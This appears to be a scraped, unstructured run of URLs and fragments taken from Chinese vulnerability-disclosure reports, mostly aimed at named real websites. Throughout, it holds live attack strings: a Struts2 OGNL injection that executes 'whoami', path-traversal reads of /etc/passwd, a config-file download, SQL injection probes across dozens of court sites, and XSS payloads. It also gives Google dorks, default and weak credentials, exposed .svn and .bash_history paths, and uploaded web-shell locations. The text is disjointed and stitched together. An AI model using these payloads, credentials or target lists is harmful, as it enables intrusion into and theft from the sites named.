http://124.207.29.201/zygg_fb/ggzx/chaxun_fenxi.asp http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_zd.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_mt.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_yl.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_ys.asp http://124.207.29.201/zygg_fb/zcfg/chaxun_qt.asp http://124.207.29.201/zygg_fb/zuoping/chaxun_2004y1.asp http://124.207.29.201/zygg_fb/zuoping/chaxun_2004j1.asp http://124.207.29.201/zygg_fb/zuoping/chaxun_2004t1.asp http://124.207.29.201/zygg_fb/huwaimeiti/search_res.asp http://124.207.29.201/zygg_fb/zhaopin/search_res.asp http://124.207.29.201/manage/ http://www.dbk.cn/ http://www.dbk.cn/common/showPic.asp?MID=4759&CNO=2008028 http://www.dbk.cn/Catalog/Catalog_Text.asp?BID=1&ORD=1 http://www.dbk.cn/SuperLibtary/ArticleSmall.asp?sid=106 http://www.dbk.cn/Catalog/ClassSearch_Text.asp?ORD=1&SID=1 http://www.dbk.cn/Catalog/ShorpCar.asp?CID=1 
http://www.dbk.cn/Catalog/Catalog_Text.asp?ORD=1&BID=1 http://www.dbk.cn/catalog/shorpcar.asp?PID=87361 http://www.dbk.cn/Catalog/ClassSearch_Text.asp?SID=1&ORD=1 http://www.dbk.cn/Catalog/Catalog_Pic.asp?Ord=1&bid=1 http://www.dbk.cn/Catalog/ClassSearch_pic.asp?Ord=1&sid=1 http://www.dbk.cn/Catalog/MagazineDetail_TB.asp?MID=5046&TID=1 http://www.dbk.cn/SuperLibtary/ArticleReview.asp?aid=38243 Url:http://demo.zoomla.cn/Plugins/Register.aspx http://m.law-lib.com/fzdt/news_content.asp?Artcle_id=78311 http://m.law-lib.com/cpws/cpwsml.asp?pages=2&type=cx http://m.law-lib.com/flsz/szml.asp?flh=a http://www.google.de/#newwindow=1&q=inurl:messageShow!show.action http://123.125.114.213/heat-map/upload/2.jsp,发现返回“Helloworld”,由此证明上传漏洞存在。 http://checi.tieyou.com/2251/2253/2257.html http://checi.tieyou.com/2251/2253/【注射语句】/2257.html http://checi.tieyou.com/2251/2253/*/2257.html http://www.yiban.cn/profile?userid=708484 http://www.yiban.cn/ajax/user_news_json_2013.php?v=9679 www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ www.yiban.cn\/mobile\ http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3Acms%2FColumn.aspx%3F tencent://message/?Menu=yes&uin=68084160 
tencent://message/?Menu=yes&uin=68084160&Site=&Service=119&sigT=2be80b3ce9cd480c95dc199635091cde577e2d8772609c471c9c976ffdd6a5fd8c1ad46e5b26a460c7e13b0f1f666d18&sigU=b1f96dbc1459d6112096ff0242c4e5823dad12504f1b5d9b8b874a876d5a2ea4d6f7ba1d2ada1377 http://219.134.187.6/manager/html ttp://219.134.187.48/tomcat/ line:1020 http://www.17miyou.com/zb/zblist.aspx?rolename=aa http://113.105.131.219 http://113.105.131.219/system/tree/pubTree!getChlildOrgByParentId.action http://union.tieyou.com/ http://www.law-lib.com/ http://www.law-lib.com/cbs/cbs-view.asp?cbsm=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.law-lib.com/flsz/szml.asp?flh=a http://www.law-lib.com/lawseek/wzcoun.asp?wz=http://www.fasac.cn/lawyer http://www.law-lib.com/lawseek/wzcoun.asp?wz=http://www.yjlawyer.cn/Main/NewsView.asp?ID=324&SortID=4 http://www.law-lib.com/flsz/szml.asp http://www.law-lib.com/lawyer/lawyerlogin.asp http://mall.heilanhome.com/ http://dg.gov.cn/ site:dg.gov.cn wanjiang.dg.gov.cn/lk_admin/login.aspx‎ admin:admin http://video.bnup.com/acenter/ http://www.iactive.com.cn/acenter/index.action http://video.bnup.com/acenter/meeting!downloadDocument.action?filePath=./WEB-INF/classes/dataBase.properties http://video.bnup.com/acenter/user.action# URL:http://core.hnitsec.gov.cn/zfaqcore/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27whoami%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://ip/wcm/console/tabPage.do?url=%2Fconsole%2Findex.do http://ip/wcm/console/tabPage.do?url=/../../../index.do此时就会进入如下页面 http://univ.zte.com.cn/WebResource.axd?d=YaWGDzoSj5Nz2vcLkzdCwg2 http://tzsj.hefei.gov.cn 
http://cloud.cintv.cn/modelVideo.action http://push.tv189.cn:8087/pushService/push/clientreceive.msp?appid=10160010000&imsiid=310260000000000&imeiid=000000000000000 sendfiles.jsp/sendfile.do http://journal.pubmed.cn/search http://www.biomart.cn/s_expriment/s?t=5&wd=%22%3E%3C%2Fscript%3E%3Ciframe%20src%3D%23%20onerror%3Dalert%28%2Fby%20wooyun%2F%29%3E%3C%22: http://search.jobmd.cn/%22%3E%3C%20script%3E%3Ciframe%20src%3D.htm#%20onerror=alert%28/wooyun/%29%3E%3C%22 http://dir.sogou.com/v53/get_123_v53.php?block=wt&c=1392388088893&cbf=fn&city=../../../../../../../../../../etc/resolv.conf%00.jpg&gfg=1&method=ajaf&pid=AQ7CZ&ver=v53 http://221.208.198.214:9090/SHIPINENWeb/login!enterprise_login.action http://www.denwell.com/locations.php?ID=1 http://www.denwell.com/locations.php?ID=1 http://www.denwell.com/locations.php?ID=1 http://etif2013.ccnu.edu.cn/ http://bacic.bacic5i5j.com/log/stdout.log.20130423 http://www.satcm.gov.cn:82/ http://www.satcm.gov.cn:82/addmail.asp?classID=1&Nclassid=2 http://www.satcm.gov.cn:1982/admin/manage.asp http://daohang.sogou.com/v53/get_123_v53.php?block=wt&c=1392388088893&cbf=fn&city=../../../../../../../../../../etc/passwd%00.jpg&gfg=1&method=ajaf&pid=AQ7CZ&ver=v53 http://www.yn.gov.cn/ http://116.52.249.41/ http://116.52.249.41/getpass.php cn:111111 cn:admin888 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:admin888 cn:111111 cn:111111 cn:123456 cn:654321 cn:111111 cn:111111 cn:111111 cn:123456 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:123456 cn:123456 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:123456 cn:123456 cn:123456 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 cn:111111 
http://live.pps.tv/index.php/play/get_program_by_label?channel_id=1&channel_name=GDTV1&l_type=live&t_date=111111 http://live.pps.tv/index.php/play/get_program_by_label?channel_id=--&channel_name=GDTV1&l_type=live&t_date=111111 http://tapp1.enavi.118114.cn:8090/dttcservice/rest/info/getinfo/ http://tapp1.enavi.118114.cn:8090/dttcservice/ admin:admin http://tapp1.enavi.118114.cn:8090/dttcservice/file/1402101314197277.jsp http://tapp1.enavi.118114.cn:8090/dttcservice/file/data.jsp www.ctrip.com/member/signupcodesubmit.asp www.ctrip.com/member/signupcodesubmit.asp http://61.191.25.187/ http://61.191.25.190/ http://61.191.25.190:8080/osm2/adminInfo!login.action http://61.191.25.187/links.asp?keyno=557 http://61.191.25.187/view.asp?keyno=1088 http://www.google.co.in/search?newwindow=1&biw=1366&bih=642&q=inurl%3APolicy%2FshowPolicy.aspx&oq=inurl%3APolicy%2FshowPolicy.aspx&gs_l=serp.3...3471208.3473695.0.3474152.9.9.0.0.0.0.0.0..0.0....0...1c.1j4.35.serp..9.0.0.k5wvqKaD2a4 http://www.guokr.com/ask/),增加提问,未对问题标题进行输入和输入的过滤编码,导致存储型xss漏洞的产生。 http://202.85.215.180/loginAction_login.action http://www.500wan.com/ http://www.500wan.com/static/info/rcjc/project/09073_rcjcfs_5.txt http://www.kugou.com/mvweb/app/index.php?a=index&tag=15&page=1 http://s1.ppsimg.com/vod/file/poster_200/9a/68/9a68db1de3878383821d82cb8ecab0c6.php http://yun.pps.tv/file/poster_200发现403, yun.pps.tv/file/poster_200/9a/68/9a68db1de3878383821d82cb8ecab0c6.php http://www.avcon.com.cn/ http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3AchangLang.action http://meeting.nsjy.com/AvconWebService/fingerprint.jsp http://meeting.nsjy.com/AvconWebService/happyaxis.jsp http://wangba.9you.com/ucenter/SearchPointRewards.aspx http://wangba.9you.com/ucenter/SearchPointRewards.aspx http://map.wo.com.cn/siweidg_womap_Ser/news/news_getHotnews.action http://www.KnifeCMS.com/FileUpload inurl:type.do?tid= http://challengeyourdo.lenovo.com/challengeyourdo.zip http://www.ccard.net.cn/ 
http://www.ccard.net.cn/ccard/sortproduct/sortCard!soryCategory.action http://222.223.188.50/ http://222.223.188.50/login!login.action http://bbs.fumu.com/tj/app_rd.php?a=1 http://www.tljrw.gov.cn/read_news.asp?id=3296 http://epos.tianan-life.com/logon/station.jsp?menuCode=7777 http://files.sogou.com/.bash_history http://localhost/ http://localhost/ http://localhost/ ftp://proxy.wsfdupload.lxdns.com http://files.sogou.com/test/ http://files.sogou.com/test/ http://files.sogou.com/test/ files2.sogou.com/sogou_explorer_silent_2.0.0.891_2180.exe ftp://125.39.17.8 http://files2.sogou.com/"$NF http://files2.sogou.com/"$NF http://files2.sogou.com/"$NF files2.sogou.com/PreUpdater130619.exe http://localhost/se_plugin/getfile?key=8f3db89aa260989bbd315c8a26764933 http://localhost/se_plugin/getfile?key=8f3db89aa260989bbd315c8a26764933 http://localhost/se_plugin/getfile?key=8f3db89aa260989bbd315c8a26764933 http://www.weimob.com:80/Webcar/CarReserveBook/pid/3453/wechatid/fromUsername/type/* http://www.weimob.com/Webcar/CarReserveBook/pid/3453/wechatid/fromUsername/type/* http://order.gmacsaic.net/mpc/util/help/help.jsp?module_code=1 url:http://book.hongxiu.com/CoverPage.aspx?ID=19146 http://jifen.qq.com/action/vipmusic/vipMusic.html?ADTAG=JIFEN.HTML5.AD.3 http://jifen.qq.com/cgi-bin/mart/PayItem.cgi?Fromaq=true&GoodsID=573&UinNum=1767070717 http://cps.gome.com.cn/ http://cps.gome.com.cn/Home/NoticeDetail?id=132 http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E ed2k://|file|%E8%8B%B1%E9%9B%84%E4%BC%A0%E8%AF%B46%EF%BC%9A%E7%A9%BA%E4%B9%8B%E8%BD%A8%E8%BF%B9FC%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%873CD%E5%AE%8C%E7%BE%8E%E7%A0%B4%E8%A7%A3%E7%8F%8D%E8%97%8F%E7%89%88.exe|468173|F85A01E2F6049D10F1881ACDA4A9F704|h=MJLSJERMY4VYJIB5ZKPP7TQHQ6HI6USW|/ http://www.thinksaas.cn/。 http://mbox.kuwo.cn:8080/ur/reflect/ http://mbox.kuwo.cn:8080/ur/reflect/question.jsp http://mbox.kuwo.cn:8080/ur/uploads/ http://search.chinanews.com/was40/ 
http://search.chinanews.com/wasadmin/ site:xunlei.com http://pai.xunlei.com/server/ http://spark.m.xunlei.com/的数据库,登陆进去打了会儿酱油,但是没拿到shell http://221.181.100.150:9090/index.jsp inurl:more.php?LocationID=0302000000 inurl:more.php?LocationID= http://zzzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://dkxfy.chinacourt.org/fygl/more.php?LocationID=0302000000%27 http://ydxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://xyqfy.chinacourt.org/fygl/more.php?LocationID=0302000000%27 http://yzzy.chinacourt.org/gg/more.php?LocationID=0302000000%27 http://jyqfy.chinacourt.org/fxyd/more.php?LocationID=0302000000%27 http://bjdxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://hnsyzy.chinacourt.org/spdt/more.php?LocationID=0302000000%27 http://sxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://hnhhzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://nbzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://gxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://wsxfy.chinacourt.org/gzdt/more.php?LocationID=0302000000%27 http://fcgzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://jxwnfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 http://bjzy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://lhzy.chinacourt.org/dwjs/more.php?LocationID=0302000000%27 http://jgsfy.chinacourt.org/fgfc/more.php?LocationID=0302000000%27 http://ncxhqfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 http://jxwafy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://lnfy.chinacourt.org/fyxx/more.php?LocationID=0302000000%27 http://yjxfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 http://ljfy.chinacourt.org/fyxw/more.php?LocationID=0302000000%27 http://xwsfy.chinacourt.org/public/more.php?LocationID=0302000000%27 http://zzzy.chinacourt.org/public/more.php?p=1&LocationID=0302000000%27 
http://qhfy.chinacourt.org/sszn/more.php?LocationID=0302000000%27 http://app.tongbu.com/gift/li http://www.xjyh.com.cn/ http://jt.xjyh.com/xjyh2009/Search.jsp http://www.vulns.org/easytalk/?m=index&a=checkreset&urldata=dXNlcl9uYW1lPXRlc3QmbWFpbGFkcmVzPWZlbGl4azN5QHFxLmNvbSZ1c2VyX2lkPTImZGF0ZWxpbmU9MTM5MjYwNDE5NQ== http://djs.dg.gov.cn/pork_data/login/‎ http://djs.dg.gov.cn,莫名的喜感。 http://meeting.ks.gov.cn/; http://meeting.ks.gov.cn/khmeeting/logon.asp http://211.137.133.107/weixin/detailBill/list.do?mobile=13992816622¤tYear=2014¤tMonth=1 https://login.taobao.com/member/login_by_safe.htm?sub=&guf=&c_is_scure=&from=tbTop&type=1&style=default&minipara=&css_style=&tpl_redirect_url=&popid=&callback=jsonp81&is_ignore=&trust_alipay=&full_redirect=&user_num_id=577433811&need_sign=&from_encoding=%810%851_duplite_str=&sign=&ll=&ei=QaIBU-XLLYze0wHy-YGoCw&usg=AFQjCNGXm310YgBJj5KDzLkZzaOAUl2UnQ&bvm=bv.61535280,d.cWc&cad=rjt http://stockdata.stock.hexun.com/2008/accountlist.aspx?app http://weigou.baidu.com/ http://218.9.***.***/city/Login.asp http://www.weimob.com/Webcar/ToolList?pid=* http://www.weimob.com/Webcar/ToolList?pid=* http://member1.taobao.com/member/user_profile.jhtml?user_id=[vul http://ratehis.taobao.com/ http://www.weimob.com/sps/webfood/doLike?aid=-1&outletid=85&v=91793f5a6ca60718716d15b5f3e64785&wechatid=fromUsername http://www.zte-e.com http://www.zte-e.com/cn/member.aspx http://www.zte-e.com/en/member.aspx http://www.zte-e.com/manage/AdminLogin.aspx http://younglight.com.cn/website/company_ldcy.jsp?classid=jtjs http://www.thinksaas.cn/。 http://subject.ourgame.com/2008/hallwin/zhuanzhuan2_lucky/coin_toplist.asp http://subject.ourgame.com/ http://image.baidu.com/channel?c=%E7%BE%8E%E9%A3%9F&t=%E5%85%A8%E9%83%A8&s=0 http://www.thinksaas.cn/。 www.resoft.css.com.cn http://www.dyfdc.gov.cn/bszn.php?type=18 http://www.dyfdc.gov.cn/newslist.php?type=9 http://www.dyfdc.gov.cn/zcfg.php?typeid=1 http://www.dyfdc.gov.cn/zfbzlist.php?type=302 
http://www.dyfdc.gov.cn/lpinfo.php?ads_id=192 http://www.dyfdc.gov.cn/zfbz.php?id=1389 http://www.dyfdc.gov.cn/ysz.php?pid=7051 http://wooyun.org/bugs/wooyun-2014-050923 inurl:was40 http://60.166.6.242:8080/was40/,属于www.ahzwgk.gov.cn子服务器 http://60.166.6.242:8080/wasadmin/ http://120.197.96.242:8022/emp/测试 http://120.197.96.242:8022/emp/getphoneword http://www.aili.com.cn/aili.rar http://www.chnsos.com.cn/ http://quan.sohu.com/pinglun/cyqemw6s1/362812738 http://1.wctest.sinaapp.com/souhu/caipiaochangyan.html即可 http://njlsdj.gov.cn/admin_zzb/adminlogin.asp http://icp.now.cn/admin/info.txt http://www.sino-life.com/cms/sinolife/index.shtml inurl:skills/login.do http://www.sdhospital.com.cn:8080/reservation/memberAction.do?code=initUpdate&id=* http://gyjy.juran.com.cn/newslist.aspx?keyword=e http://gyjy.juran.com.cn:80/newslist.aspx?keyword=* http://moviestorm.baofeng.com/baofeng.zip http://gtpt.mengniu.cn:8080/login.action http://www.mofi.cn/index.php?p=3&prdsearch_submit= http://wenwen.soso.com/z/q130668781.htm?ch=wtk.title http://wlpx.tax-edu.net/jsp/common/download.jsp?filepath=/jsp/common/download.jsp http://sobar.soso.com/b/489163 http://sobar.soso.com/t/94200685 http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 http://220.181.125.164/.svn/entries http://220.181.124.78/.svn/entries http://220.181.125.131:8080/ http://demo1.515158.com/index.php http://demo1.515158.com/index.php http://see.bupt.edu.cn/school/postgraduate/tutor_detail.php?id=1001 http://see.bupt.edu.cn/school/postgraduate/tutor_detail.php?id=1001 http://www.linekong.com/pay/sk_core.php?city=%E5%8C%97%E4%BA%AC http://www.linekong.com/pay/sk.php?city=%E4%B8%8A%E6%B5%B7 http://www.linekong.com/pay/xk_core.php?city=%E4%B8%8A%E6%B5%B7 http://zskd.open.com.cn/web/guestbook_add.aspx http://zskd.open.com.cn/web/guestbook_add.aspx http://125.70.15.72/ http://op.521g.com/login.html ftp://协议时有问题,指针没有判空导致所有进程崩溃。 
http://mobile01.yiban.cn/api/pages/v2/action.php?action=commentlist&id=1607817&sid=Ei6LyFJIV0zNNtjhnzISGnj9FI5G/0%20A4lXQNWjIbBxT70XoelvNaTczJa/SgTvUb4LQV0lwW1o=&page=1 http://ny.shangdu.com/www.rar http://flight.mall.ecitic.com/ecitic.zip https://egg.alipay.com/index.php?r=attachment/ViewPicture&id=28449 https://egg.alipay.com googledork:site:gov.cn inurl:ConInfoParticular.jsp?id http://74.125.235.191/#newwindow=1&q=site:gov.cn+inurl:ConInfoParticular.jsp%3Fid http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=4879 http://info.tjjn.gov.cn/ConInfoParticular.jsp?id=508 http://zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=1605 http://www.tjnh.gov.cn:7002/ConInfoParticular.jsp?id=2206 http://zwgk.tjhexi.gov.cn:8080/ConInfoParticular.jsp?id=1192 http://gk.tjnk.gov.cn/ConInfoParticular.jsp?id=997 http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=21 http://demo.smartoa.com.cn/ https://10.100.113.11/login.php http://author.xxs8.com/booktaskbox_vip.php?book_id=123 http://www.phpmywind.com/看了下,最新版是4.6.6,更新时间是13/11/28。去年知道创宇曾发布PHPMyWind三个SQL注入补丁→http://bbs.anquan.org/forum.php?mod=viewthread&tid=26575 http://www.e-picclife.com:80/ www.e-picclife.com http://jc.sto.cn/verificationCodeCheck.action http://211.139.67.46/ http://test1.api.renren.com/data?category=app http://test1.api.renren.com/data?category=api http://180.168.117.34:3000/ http://jz.shangdu.com/jz.rar http://112.122.11.135/ http://www.xjmic.com/enterprisemonitor/webpage!indexPage.action http://222.247.51.155:9000/webpage!indexPage.action http://nmgepb.gov.cn:8088/enterprisemonitor/webpage!indexPage.action http://182.148.109.184/enterprise-info!getCompanyInfo.action www.able-elec.com)的卓越课程中心,到底有多少?访问卓越课程中心联盟(http://www.g2s.cn/)可见一斑。 http://cc.bjmu.edu.cn(1310116113:1310116113|1310116114:1310116114|...)| test1:test1(http://cc.bjmu.edu.cn http://cc.xjtu.edu.cn 
test2:test2 test20:test20 http://cc.sjtu.edu.cn/G2S/MySpace/UserControl/UCRSS1.ashx?OptType=ConfirmRssInfoByID&ID=147843&sname=modified&sfeed=http%3A//jwc.sjtu.edu.cn/rss/rss_notice.aspx%3Fsubjectid%3D198015%26templateid%3D221027 http://oa.damai.cn/login.action https://58.213.29.118/jmx-console/ http://sdnh.citybank365.com/ http://you.ctrip.com/food/hangzhou14/254994.html?RandomCode=2185#comment http://hb.ccb365.com/ http://211.90.241.26/ http://211.90.241.26/main.asp http://bi.m1905.com/wap.login.jsp http://C1.B1.letvcloud.com:20000 http://wooyun.org/bugs/wooyun-2014-050537里,已经获得了10.B20.C77.D140的root密码。 bbs.cntv.cn/amin/.svn/entries bbs.cntv.cn/attachments/.svn/entries https://svn.comsenz.com/cctv/bbs/patchs/20120109/2725&2738/admin https://svn.comsenz.com/cctv http://www.czb.gov.cn/admin/admin!login.action http://beijing.998.com/web.rar http://changzhou.998.com/web.rar http://chongqing.998.com/web.rar http://hangzhou.998.com/web.rar http://shanghai.998.com/web.rar http://www.998.com/web.rar http://www.jdgame.cn/index.php?m=member&c=index&a=account_manage_avatar,通过截断,修改上传的内容,利用压缩文件夹实现绕过 http://ziyuan.iiyi.com)存在存储型XSS漏洞。 http://ziyuan.iiyi.com/source/search/?kw= http://hd.91.com/activity/dsn/upload.php http://hd.91.com/activity/dsn/image/userphoto/88e4ea6b097acc9c089ce9fb90b0c132.php http://hd.91.com/sysadmin06u.php http://med.tcl.com/tcl.rar PS:http://www.wooyun.org/bugs/wooyun-2014-051067/trace/1df1d1fd36fc7e1a4702bff7b6c97c05 www.the9edu.com http://www.supor.com.cn:80/videoList.php?tp=1 http://221.10.182.9:7777/login.asp http://luxury.sohu.com/20140218/n395206851.shtml http://pp.sohu.com/upload/site?callback=jQuery17103956824508495629_1392796395240&desc=送妹子了&url=http://img0.bdstatic.com/img/image/cm29.jpg&get_recent_photos=true&from=sohunews&_=1392797550461 http://demo.chshcms.com/index.php/dance/so/key/%27 http://demo.chshcms.com/index.php/dance/so/key/wooyun http://demo.chshcms.com/index.php/dance/so/key/wooyun%27%20or%20%27%25%27%3D%27 
http://edu.qzs.qq.com/qzone/app/blog/v6/swf/MusicPlayer.swf http://www.i-manji.com/products.php?fid=3 inurl:/mbxtwlfwpt/ http://218.26.163.99:9080/mbxtwlfwpt/rygl/bpzyryxkzsq.do?method=goSq&flag=sy)处头像上传处存在XSS,头像信息是经过编码输入与输出的,但是是本地编码解码,可以通过http拦截修改,控制数据。由于本人水平有限不进行跨站演示了,会对系统产生垃圾数据! dword:00000002 IP:192.168.19.45 localPort:49382 http://www.i-manji.com/stores.php?fid=2 http://www.i-manji.com/stores.php?fid=2 url:http://www.lagou.com/subject/sharebonus.html http://www.baby868.com/ http://nb.gfan.com/下ecshop漏洞 report:Array http://211.90.246.57/webagent/files/main.jsp http://www.acer.com.cn http://you.ctrip.com/travels/youyouctripstar10000/1706380.html http://www.ccmids.cn/adminidc http://www.ccmids.cn/1.php http://www.ccmids.cn/2.php http://lp.sto.cn/ http://202.109.255.72/ http://www.zte-d.com/admin/index.php http://www.cs12333.com/ http://61.187.87.130:7080/cs12333net/fwld/fwld_detail.jsp?id=131107001266 http://www.padis-int.org/index.php?c=main&a=view&id=443 http://www.17u.cn/communityhotel.aspx?ChainId=&CityId=1&page=5 http://www.17u.cn/communityhotel.aspx?ChainId=&CityId=1&page=5 http://site.vegaga.com/user/toLogin.action http://v5mall.v5shop.com.cn/productreview.aspx?productid=657 http://go.client.lashou.com:80/index.php/Seven/mylist/cancel_order/STID/groupbuy_4.82_ipad_10000_c9ea79576bf848d860b1a9820e286df4fd483e88_43746679_2419_iPad4,1_7.0.4_43D1A5CC-C1A4-4EAA-A833-E376C5849BAD_c9ea79576bf848d860b1a9820e286df4fd483e88 http://sdk.zuche.com/CARSDK/services/ http://gz.ccb365.com/ParkLifeZaJinDanAward/Default.aspx http://he.ccb365.com/ParkLifeFashAward/FashAward.aspx http://ln.ccb365.com/ParkLifeFashAward/FashAward.aspx http://sunew.ccb365.com/Online/Default.aspx http://hb.ccb365.com/ParkLifeFashAward/OrderList.aspx http://sxw.ccb365.com/Login.aspx http://www.wsdoing.com/AdminMaster/Default.aspx http://www.gansu.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date= 
http://ln-n-tax.gov.cn/jis/objectbox/selx.jsp?tabid=1&limit=1&f_id=userid&f_name=vc_username&date= IP:202.104.120.28 User:root http://60.191.59.12:8000/webroot.rar http://www.huangling.gov.cn/xmgk_view.php?id=546 http://122.13.177.250:8081/index.html http://www.zxxxkj.com/cgal.php http://218.202.7.116:8080/login.do http://shuqian.qq.com/post/ http://you.ctrip.com/events/beijing1/2331028.html http://www.gdmc.edu.cn/view.php?id=11905 http://oa.ctrl.189.cn/web/web.rar http://oa.ctrl.189.cn/web/.svn/entries http://www.e-tiller.com/ch/index.aspx http://www.e-tiller.com/ch/reader/view_cpList.aspx http://uustj.cnjournals.cn/ch/author/login.aspx www.hdt.net.cn存在注入 http://convenient.hdt.net.cn/bmshow.asp?id=104025 http://article.hongxiu.com/diary/mydiarylistzt.asp?countnum=129&go=%c8%b7%b6%a8&page=20&px=&zt= http://www.hp1997.com/passport/ajaxservice.aspx?acion=CheckUnicknme&uid=1 http://www.hp1997.com/passport/ajaxservice.aspx?acion=CheckUnicknme&uid=1 http://kyc.sdpec.edu.cn/kycinfo/../kycinfo/display.php?id=27 http://kyc.sdpec.edu.cn/kycinfo/../kycinfo/display.php?id=27 http://news.gbicom.cn http://yule.sohu.com/upload/join.html http://www.crcf.org.cn/donationol/yanran_guangrong.asp?page=1 http://data.jxjsjy.com/webservice/validIdCard.asmx?wsdl http://office.homeinns.com/ http://guanggao.guoshi.com/videopages/firstclass.php?order=votenum http://www.post183.net/post183/post183new/detailnews.php?id=4115 http://www.post183.net/post183/sannong/detailnews.php?id=160 http://www.post183.net/post183/sannong/more.php?a=tgmenu6&mytype=%C5%A9%D7%CA%D5%B9%CC%A8 http://www.lhtex.com.cn/newshow.asp?bid=2&id=717 http://partner.etms.360buy.com/OrderDeliveryQuery/PS_QuanChengGenZong.aspx http://partner.etms.360buy.com/PartnerIndex.html http://partner.360buy.com/3plhrm/NewHrm/EmployeeAdmin.aspx http://www.qiushibaike.com/users/14288550/follow http://www.n-s.cn/cn/news/class/index.php?author=&catid=0&key=&myord=dtime&myshownums=1 http://www.n-s.cn/phpMyAdmin/index.php暴力破解出root密码为123 
http://www.ahly.gov.cn/ http://malx-media-player.software.informer.com/ http://218.206.167.114/wcn/frame http://218.206.168.218/doc/page/main.asp http://office.homeinns.com/hcs/引起的。各种不用ikey就可以登录的弱口令,各种不防暴力破解连个验证码都没有…… http://office.homeinns.com/hcs/Configure/Filesmanage.aspx http://app.abchina.com/mobileSiteSimple/Mobile/FundSearchResult.aspx?currtpn=1&fn=ETF http://www.soufun.com/ask/ask_7039845.html http://www.cnpostair.com/gk.asp?xwClass=%B9%AB%CB%BE%BC%F2%BD%E9 http://www.xftech.com.cn/about.php?typeid=18 http://126.am/SlQop0 http://www.lhtex.com.cn/message.asp http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848 http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848'and'a'='a http://app2.bjepb.gov.cn/cpout/Attachment/Downloadout.aspx?ispdf=0&ID=1b82b3b2-a1eb-4081-876b-d86e45485848'and'a'='aa http://app2.bjepb.gov.cn/cpout/out/logon.aspx http://mzj.bjft.gov.cn/cmd.aspx http://data.bd.baofeng.com/admin/gotologin.box http://ball.damai.cn/Sportlist.html?pid=6&cityId=852&areaid=0 http://www.bjwendeng.com/?com=ydy&task=xx&pid=17 http://www.bjwendeng.com/?com=zyk&task=xx&pid=2 http://www.10086.cn/cmccclient/andriod.html cn:8080 http://www.9ask.cn/9ask.cn.rar http://u.fumu.com/ https://acjstb.aliyun.com/flash/JSocket.swf https://acjs.aliyun.com/flash/JSocket.swf http://www.kingqer.com/NewsDetail.aspx?stype=2&id=455 http://ir.anta.com/tc/home.php?option=3&id=4&Itemid=3&year=2007 http://hp1997.com//include/SearchKey.aspx?_=1392972501472&wd=aaaaa http://m1.seeyon.com 